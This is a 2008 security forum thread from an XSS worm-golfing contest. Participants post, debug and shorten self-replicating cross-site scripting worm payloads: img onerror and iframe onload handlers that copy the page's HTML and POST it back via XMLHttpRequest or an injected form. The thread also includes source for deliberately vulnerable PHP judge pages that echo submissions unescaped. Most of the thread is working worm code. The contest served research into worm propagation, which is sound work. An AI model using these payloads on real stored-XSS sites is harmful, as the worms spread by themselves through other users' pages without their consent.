Self referencing image worm:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">

Expect a ton of posts :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/09/2008 08:35AM by Gareth Heyes.

@Gareth - You seem to have forgot the payload, but otherwise nice one.

Here is what I came up with off of yours, though it is 99% yours:
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">



Edited 1 time(s). Last edit at 01/09/2008 08:52AM by Matt Presson.

Digi7al, your XHR 140 byte xss worm doesn´t seem to work here. The PHP complains about missing content.

Shame about the content type header eh? :( ah well :-

<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's another without XHR:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

As far as I can tell, both the "application/x-www-form-urlencoded" content type header and encoding (even if improper) honoring the declared content type are mandatory to ensure reliable Apache compatibility (which is required by rule #9).
Moreover, the "We'll assume post.php will properly URL unescape your code" words in rule #2 authorize the assumption that the receiving endpoint is a PHP script processing the POST as urlencoded name-value pairs, e.g. through the auto-populated $_POST superglobal. Therefore, plus signs ("+") will be turned into spaces, and even weirder stuff is gonna happen if your payload contains ampersands ("&") unless you escape them.

For these reasons, I think the shortest fully compliant XHR code so far is the following:

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"

The 209 bytes above have been the bare minimum I needed successfully replicate on a stock Apache 2.2.6 (Fedora) powered by PHP 5.2.4 (mod_php), all from FC7 rpms (definitely not an "exotic configuration").

If we drop the explicit header setting but we keep the "+" escaping requirement, assuming Apache or the browser will "automagically" guess the proper content-type (which I couldn't see happening anyway), it becomes:

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"

140 bytes

Otherwise, dropping all encoding requirements (which doesn't make much sense, IMHO), we could strip it down to:

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"

132 bytes

-- edit
Added missing ")" at the end of the 132 bytes vector spotted by Ronald (just a typo, count was right and remains the same).

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:06PM by ma1.

Well, it works like a charm on 4 Apache instances, so it's just not true ma1, Apache does handle the content-type itself through content negotiation, everything being send is executed perfectly. If it wasn't it would fail, but it doesn't fail on 4 machines, the worm gets properly posted and processed like the specs tells us to. But, I'm not the judge.

Ronald Wrote:
-------------------------------------------------------
> Well, it works like a charm on 4 Apache instances,
> so it's just not true ma1

Wow, if you're right my 132 byte above is the winner so far, unless I'm missing some post ;)
What I pity I cannot see it working...

> Apache does handle the
> content-type itself through content negotiation

I believed content-negotiation was a mechanism for choosing the variant of the content best suitable to the user agent and serve it through the downstream, rather than the way around.
But if it works like you say, and the upstream is "negotiated" to application/www-form-urlencoded, what does happen to the "+" char I can see in every single XHR entry when it is properly URL unescaped per rule #2? Shouldn't it become " " according to this specification?
In other words, did you try to echo $_POST['content'] in a real post.php script?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

I havent managed to get $_POST['content'] on any machine.. Apache 1.3 nor Apache 2, on windows.. nor Linux.. maybe on another OS..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

No not alone, it is also involved in guessing the mimes, plus the content-type as well as more stuff, like extension mapping.

I did tested it with a post.php file, and echoed back content, of course ;) when strislashes applied, it went into a loop proving that it functions. But, remember I am talking about my vector, plus .mario's one. the IMG vector respectively: 134 and 135 bytes.

I thought about XHR caching, but after some tests that wasn't the case either. So I am a bit in a blur here due to your results. Turn off NoScript! ;))

> I did tested it with a post.php file, and echoed
> back content, of course ;)

Leaving the "+" char untouched?
Happy to hear that, I hope RSnake's has the same setup as yours, otherwise I'm just second behind .mario "the sniper" :P

> remember I am talking about my
> vector, plus .mario's one. the IMG vector
> respectively: 134 and 135 bytes.

Once the request is on the wire, they're perfectly equivalent to those 132 bytes of mine.

> So I am a bit in a
> blur here due to your results. Turn off NoScript!
> ;))

NEVER!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

:S I dunno what I'm doing wrong..

<?php
    if(isset($_POST['content']))
        die($_POST['content']);
?><html>
<head>
<title>try 1</title>
</head>
<body>
<script type="text/javascript">
var x=new XMLHttpRequest();
x.open("POST","post.php",false);
x.send("content=hello");
alert(x.responseText);
</script>
</body>
</html>

--edit 1
btw that alerts the same source code, it should alert "hello".

--edit 2
it works with the content-type header

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 12:48PM by sirdarckcat.

haha yes..

ma1, This is strange. I can now confirm indeed that it doesn't work. I did try one of my own vectors again on a simple Apache 1.3.39 and it didn't respond anymore. Hmmm, in that case all vectors without the proper encoding are invalid. I'm still trying to understand what happened, or what went wrong here. So, indeed we must rule them out ma1, your absolutely right here.

btw, your latest 132 misses a: ")" in my testlab, well it's invalid anyhow now.

woohoo! it gets exciting, so short till the end :)

@Ronald:
thanks for spotting the missing ")", it was just a transcription typo (the 132 count was right).
Edited above.
Anyway, as far as I can see my 209 is "the shortest compliant XHR possible", right?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

With the test I meant:

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

@ma1

Same as mine if this works on IE:-
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth:

watch out the "+", it becomes " ".

If it didn't mine would be just:

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"

(201 bytes)

-- edit 3
did a mess copying and pasting from the wrong post, fixed now

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:48PM by ma1.

I guess it's oficial, that the content-type must be set: http://www.w3.org/TR/XMLHttpRequest/#setrequestheader

It states for clients (like a browser):

"If no Content-Type header is in the list of
request headers append a Content-Type header to the list of request
headers with a value of 'application/xml'."
- so that is the default, if none is set.

a real bummer actually, but it was too good to be true. Now it's to go back in my tracks and find out what caused it to execute while the vector was absent of the required mime.

@ma1 yes, I saw.

But I like the image better, for various reasons and aestetics :) so vain, so vain I know.

Ronald:
so.. we can do this?


<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>

?? that would also be awesome..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@sdc: it also missed: ')'

No that doesn't work :)

bah nothing works :(
so, we have 1 more day guys!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

I'm a bit confused now, what kinds of methods do we have now? is it a good idea to sum them up? because it's way muddy now.

IMO this can be ruled out as far as I know:


- XHR without content-type
- vector with only id, or document selectors like: id="bar" bar.foo(), or only document.foo.bar()
- iframes without closing tag (exception on:slice)
- stuff like: src=. since it becomes: =""

Oookay, some clarification needed, it looks like. XHR without content type looks like it's okay. (Sorry, there was some confusion on my part about what FF2.0.0.11 did and didn't automatically send)

Vectors with id="bob" are okay, as long as you define them. Vectors referencing { or < or any often used char should be considered non-starters for the same reason body=onload is a non-starter. It'll conflict with too many pages.

iframes without closing tags are fine (as long as they don't grow) - slices are okay

About the + thing, assume plusses are treated as spaces. Eg:

echo urldecode($_REQUEST[content]);

___REVISED REGARDING XHR___

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 05:52PM by rsnake.

For what it's worth, here's my final submission:

form: 152

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


xhr: 198

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

Going to bed now, i'm tired! :) goodluck fellas, have a good one.

this are the sources of the unnoficial judges:
judge1.php

<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge1.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>

judge2.php

<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge2.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>

post.php

<?php
session_name("XSSCONTEST");
session_start();
$_SESSION['count']++;
$_SESSION['content']=stripslashes($_POST['content']);
?>
<script>self.location.href=document.referrer;</script>

js.js

if(document.cookie.match(/noalert=1/)){
	eval("v"+"a"+"r"+" "+"a"+"l"+"e"+"r"+"t"+"="+"'"+"'"+";");
	alert=function(x){
		try{
			if(/^xss$/i.test(x)){
				document.getElementById("passed").innerHTML="CORRECT";
			}else{
				with(document.getElementById("passed"))
					innerText=textContent="WRONG - "+x;
			}
		}catch(e){
			try{
				window.onload=function(){
					alert(x);
				}
			}catch(e){}
		}
	}
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Return the alert".link("javascript:document.cookie='noalert=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Remove alert".link("javascript:document.cookie='noalert=1';location.reload();")
		}
	}catch(e){}
}
if(document.cookie.match(/triggerevents=1/)){
	function trig(odom){
		for(var i=0;i<odom.childNodes.length;i++){
			try{odom.childNodes.onmouseover();}catch(e){}
			try{odom.childNodes.onmousemove();}catch(e){}
			try{odom.childNodes.onmousedown();}catch(e){}
			try{odom.childNodes.onclick();}catch(e){}
			try{odom.childNodes.onfocus();}catch(e){}
			try{odom.childNodes.onmouseup();}catch(e){}
			try{odom.childNodes.onblur();}catch(e){}
			try{odom.childNodes.onsubmit();}catch(e){}
			if(odom.childNodes.childNodes){
				trig(odom.childNodes);
			}
		}
	}
	function ttv(){
		trig(document.body);
	}
	try{
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Dont trigger events".link("javascript:document.cookie='triggerevents=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		function ttv(){}
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Trigger events".link("javascript:document.cookie='triggerevents=1';location.reload();")
		}
	}catch(e){}
}
window.onload=function(){tal();tev();ttv();}

css.css

#passed{background-color:green;color:black;}
h1 a{display:block;}
body,a{background-color:black;color:white;}
textarea{width:100%;background-color:black;color:white;}

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 02:51PM by sirdarckcat.

149 chars!!!! new leader?

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 02:47PM by Gareth Heyes.

rsnake Wrote:
-------------------------------------------------------
> Vectors with id="bob" are okay, as long as you
> define them.

What about doctype?
Most if not all the vectors posted here reference elements by id using the deprecated <foo id="bar">...<script>bar.doSomething()</script> idiom, which won't work depending on doctype.
I suppose you mean that id="bob" is okay as long as you retrieve the node using document.getElementById("bob") right?

@Ronald:
they both grow (the iframe one on IE only).

@Gareth:
ditto, you can prevent iframe from growing using slice, but it will buy you too many chars.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 02:53PM by ma1.

I hope the ; wasn't a mistake Gaz! ->148

<form><input name='content'><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

149 anyway..

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 02:54PM by sirdarckcat.